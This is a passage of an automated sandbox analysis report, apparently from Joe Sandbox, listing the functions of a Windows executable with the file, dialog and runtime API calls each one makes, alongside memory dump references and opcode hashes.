GetLastError.KERNEL32 ref: 00007FF6EF6BD02E

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 31bdbebb0b85d60902ef083526541ee72a562a1f20adb25ae37104f4e5c60490
Instruction ID: 5f356795ffc94ae6282f520bc216793f442c8e3523fbcfa5c9f268403546877a
Opcode Fuzzy Hash: 31bdbebb0b85d60902ef083526541ee72a562a1f20adb25ae37104f4e5c60490
Instruction Fuzzy Hash: 1A116D23A0864183EB648F25A4403A82364EB84B68F544731EA3D972D8DF3ED597D30A

Function 00007FF6EF6BDB64 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00007FF6EF6BD782,?,?,00007FF6EF6B91EB), ref: 00007FF6EF6BDB93
SetFileAttributesW.KERNEL32(?,00007FF6EF6BD782,?,?,00007FF6EF6B91EB), ref: 00007FF6EF6BDBC0

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9922b51953f326bddede81da838ac517d88a3aa880a3b7e29d323bb0935ea4de
Instruction ID: f435b404438213211bcf4b80223c8c64f543fae9276549fc2cddca11ab1041a5
Opcode Fuzzy Hash: 9922b51953f326bddede81da838ac517d88a3aa880a3b7e29d323bb0935ea4de
Instruction Fuzzy Hash: 04017123B18A8243E660DB11A44039923ACBB89BC0F544131ED8DC7759DF3ED6869B09

Function 00007FF6EF6B13D0 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EF6C2550: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6C25A8
Part of subcall function 00007FF6EF6C2550: SetDlgItemTextW.USER32 ref: 00007FF6EF6C2617
Part of subcall function 00007FF6EF6C2550: GetWindowRect.USER32 ref: 00007FF6EF6C2651
Part of subcall function 00007FF6EF6C2550: GetClientRect.USER32 ref: 00007FF6EF6C265F

GetDlgItem.USER32 ref: 00007FF6EF6B1420
SetWindowTextW.USER32 ref: 00007FF6EF6B143C

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ItemRectTextWindow$Clientswprintf
String ID:
API String ID: 3322643685-0
Opcode ID: 56b4ef3a8ca9051483f4fde00dc832cb4ef6496f92d169b50556cc8b670c4359
Instruction ID: 95c50f1d0bd0c1400b40222eef5e07e1bcefdb40163949553dbbf16061825f07
Opcode Fuzzy Hash: 56b4ef3a8ca9051483f4fde00dc832cb4ef6496f92d169b50556cc8b670c4359
Instruction Fuzzy Hash: 3A01BC26E0C28613FE094B52B4143B913A5AF85740F084431ED4D87299DFBEE184D30A

Function 00007FF6EF6BD408 Relevance: 3.0, APIs: 2, Instructions: 32fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00007FF6EF6BC5D2), ref: 00007FF6EF6BD430
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00007FF6EF6BC5D2), ref: 00007FF6EF6BD45B

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 14817deb9e469959f4c519e694afdcff73abcf349b9dcd90aa63010e06c77982
Instruction ID: f3789c0700a4da27fb2fc2b39e6260425b60401a556afb9feb7c0152cfb9e075
Opcode Fuzzy Hash: 14817deb9e469959f4c519e694afdcff73abcf349b9dcd90aa63010e06c77982
Instruction Fuzzy Hash: ADF0AF23B1868243E6609F21E9103EA635CBF49BC4F800031E9CDC7699DF2EE2849B09

Function 00007FF6EF6BD4A0 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00007FF6EF6BD746,00000001,00000001,?,00007FF6EF6BD343,00000001,?,?,00007FF6EF6B91EB), ref: 00007FF6EF6BD4C8
GetFileAttributesW.KERNELBASE(?,00007FF6EF6BD746,00000001,00000001,?,00007FF6EF6BD343,00000001,?,?,00007FF6EF6B91EB), ref: 00007FF6EF6BD4F1

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ac0b94f312213f30e4f1ffecd14a14af6a49e72a4523b7e70f9c6c714eb6493f
Instruction ID: fca7fc2732c636d6803e40dc9c6735d643935911f62651018de3c1e26bb222ec
Opcode Fuzzy Hash: ac0b94f312213f30e4f1ffecd14a14af6a49e72a4523b7e70f9c6c714eb6493f
Instruction Fuzzy Hash: 8CF0AF23B1868143E660AB64E8503A963A8BB4C7D4F400531EA9CC7799DF7EE6849B05

Function 00007FF6EF6C4F90 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(00000000,00007FF6EF6C3830), ref: 00007FF6EF6C4FBE
LoadLibraryExW.KERNELBASE ref: 00007FF6EF6C4FE9

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 3eea30f6c570d66af2bbf58731e05050acf4960456867659ee8e440163dd4e16
Instruction ID: cc05c05c852264ce1e9402b6089891df650fda3efca418ede03a1b503db941b7
Opcode Fuzzy Hash: 3eea30f6c570d66af2bbf58731e05050acf4960456867659ee8e440163dd4e16
Instruction Fuzzy Hash: B6F09623B1858193FB70AB10E8113EA6368BF8C784F400031F9CDC7659DE2DE245DB45

Function 00007FF6EF6C5A44 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6EF6C5A99,?,?,?,?,?,?,?,?,00007FF6EF6BEFCE), ref: 00007FF6EF6C5A48
GetProcessAffinityMask.KERNEL32 ref: 00007FF6EF6C5A5B

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 2ea2a73d1e5f90ccb45dbe3b28c4e81f4deac0d6f0f8a6f3c57ebbd5e1b152f1
Instruction ID: 093501e4b641b7a5fcb398e6492031dd52fea4285805c007e8381d3c3bc1d305
Opcode Fuzzy Hash: 2ea2a73d1e5f90ccb45dbe3b28c4e81f4deac0d6f0f8a6f3c57ebbd5e1b152f1
Instruction Fuzzy Hash: 09E02B63F1468287DF088F9AC8405E97395EFC4B40B848136D50EC3614EE2EE6498701

Function 00007FF6EF6D6850 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6EF6D6880

Part of subcall function 00007FF6EF6D71A0: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6EF6D71A9

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6EF6D6886

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
String ID:
API String ID: 1173176844-0
Opcode ID: 0e739d31772a395dab13472248fdbade556b136d12e7837296ebec5d68a17119
Instruction ID: 40f5f3e670cd7383ad0e9fa1ad7ed23e9007cecfd96c430bfe3c3c5df2b0a66d
Opcode Fuzzy Hash: 0e739d31772a395dab13472248fdbade556b136d12e7837296ebec5d68a17119
Instruction Fuzzy Hash: 1FE0B652E1910743F96832A218153B4034C0F58774F6C1B30E93E892D7ED1FA4966B2A

Function 00007FF6EF6E1A84 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL ref: 00007FF6EF6E1A9A
GetLastError.KERNEL32 ref: 00007FF6EF6E1AAC

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: e3635b7cea3a3b50ac01d0ebb9d073b96dd5648f5856d7e6baa1fb7098396ee9
Instruction ID: e20f6f3adc96cf76fcbe4b3807eb7c8217fd069ee72bae045e04b8d1fbf00d58
Opcode Fuzzy Hash: e3635b7cea3a3b50ac01d0ebb9d073b96dd5648f5856d7e6baa1fb7098396ee9
Instruction Fuzzy Hash: 3CE08C67F0910383FF08ABB2AC0537823B96F44B84B048034C81DC6291EE2EB681A34B

Function 00007FF6EF6D978C Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

__vcrt_FlsAlloc.LIBVCRUNTIME ref: 00007FF6EF6D9797
__vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6EF6D97C7

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Alloc__vcrt___vcrt_uninitialize_ptd
String ID:
API String ID: 3765095794-0
Opcode ID: 6b5ec4c6cd7f0baa5d3f7175a74b30a0589591f587f1918e98c5ab1e0d2ef736
Instruction ID: 80af442c33eba9d585ef3f60e35e65af6312f2dc5401920c6bfa79ac65de9da4
Opcode Fuzzy Hash: 6b5ec4c6cd7f0baa5d3f7175a74b30a0589591f587f1918e98c5ab1e0d2ef736
Instruction Fuzzy Hash: B0E01266D0C64397FA507F34984527413582F41350F700631D01DC66E6EF2FA456BF0E

Function 00007FF6EF6D4C78 Relevance: 2.5, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

wcscpy.LIBCMT ref: 00007FF6EF6D4CAF

Part of subcall function 00007FF6EF6C4D3C: wcscpy.LIBCMT ref: 00007FF6EF6C4D7E

wcscpy.LIBCMT ref: 00007FF6EF6D4CD1

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: wcscpy
String ID:
API String ID: 1284135714-0
Opcode ID: 93782bb743bf98bc08d0833e6c61ecd22693001662f042d55035a30427c11cef
Instruction ID: 52f5aa63743357a5639e2ccab031957bdf1c45b06c554471ffd17043acf1b992
Opcode Fuzzy Hash: 93782bb743bf98bc08d0833e6c61ecd22693001662f042d55035a30427c11cef
Instruction Fuzzy Hash: 3E219A6791D58797FA00AB24F8613A43768AF54340F401032E48DC62AAEE3FE62DD70A

Function 00007FF6EF6E029C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6EF6E02C4

Part of subcall function 00007FF6EF6E0454: GetModuleHandleExW.KERNEL32 ref: 00007FF6EF6E0474
Part of subcall function 00007FF6EF6E0454: GetProcAddress.KERNEL32 ref: 00007FF6EF6E048A
Part of subcall function 00007FF6EF6E0454: FreeLibrary.KERNEL32 ref: 00007FF6EF6E04AF

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: a28b435e1cb4af45411b9b6ddea98d7579c3164ea4b21b5d1857de89c8c0bbda
Instruction ID: c028c5d6d4408a17dc9b61beeb03afc3677d5cee4f7f0a0e38966dc8ca695203
Opcode Fuzzy Hash: a28b435e1cb4af45411b9b6ddea98d7579c3164ea4b21b5d1857de89c8c0bbda
Instruction Fuzzy Hash: F541BD23A1960393FF649B11AC503392369BFE0B80F105035D90DC7691EF7FEA41A30A

Function 00007FF6EF6D1770 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EF6C6B64: CompareStringW.KERNEL32 ref: 00007FF6EF6C6BD4

Part of subcall function 00007FF6EF6D122C: SetCurrentDirectoryW.KERNELBASE ref: 00007FF6EF6D1230

SHFileOperationW.SHELL32 ref: 00007FF6EF6D1834

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: CompareCurrentDirectoryFileOperationString
String ID:
API String ID: 3543741193-0
Opcode ID: 1a13422cf893634dff6018976258695094e37760d6f8a7e2a768e783f6d26740
Instruction ID: c4d3dab19f94ff9613691ab9dd512b2824f4b0346b345019b6eb0146a7a2de39
Opcode Fuzzy Hash: 1a13422cf893634dff6018976258695094e37760d6f8a7e2a768e783f6d26740
Instruction Fuzzy Hash: FC216027A1864683FA20EB61E4513AA6368FF84344F900431E58DC76A6EF7FF145DB0A

Function 00007FF6EF6E56FC Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6EF6E5730

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 6af88fc6ebfe8f99a723ca692a47c83e6077e8e003402135c64b1b096b41092a
Instruction ID: 397695de25a9e76c67f42a002c8eea1913af69cb3662f57fb4d0a6c5a76c2d18
Opcode Fuzzy Hash: 6af88fc6ebfe8f99a723ca692a47c83e6077e8e003402135c64b1b096b41092a
Instruction Fuzzy Hash: 8A114C37A1C642C7FA109F10A84177967A9FB40384F550535E68EC7691DF3EEA30A71A

Function 00007FF6EF6E1AC4 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 6fe7383ab83a134d2ad18e3cddc5ab59d7a07864f2eeddf8e09232de20e9074a
Instruction ID: 4326997781c7bfd54fa2bb4e5210fbffc4ab996c5c46875e6ad2a099b21b9379
Opcode Fuzzy Hash: 6fe7383ab83a134d2ad18e3cddc5ab59d7a07864f2eeddf8e09232de20e9074a
Instruction Fuzzy Hash: D9017143B0C24283FD645B666E543B923789F49BD0F146231D82DC72C6ED2EA740B20B

Function 00007FF6EF6D5E2C Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF6EF6D5ED8: GetModuleHandleW.KERNEL32(?,?,?,00007FF6EF6D5E47,?,?,?,00007FF6EF6D61FA), ref: 00007FF6EF6D5EFF

DloadProtectSection.DELAYIMP ref: 00007FF6EF6D5E9D

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: DloadHandleModuleProtectSection
String ID:
API String ID: 2883838935-0
Opcode ID: 21079e0b07ac6ac13b1efb3e694a6ae9fc15d94165a90d399f4b9b68c1711a0c
Instruction ID: 7b2703de436e6824749a8d1c9fb3f579847d551b30dd58ec97d683f1e427c77e
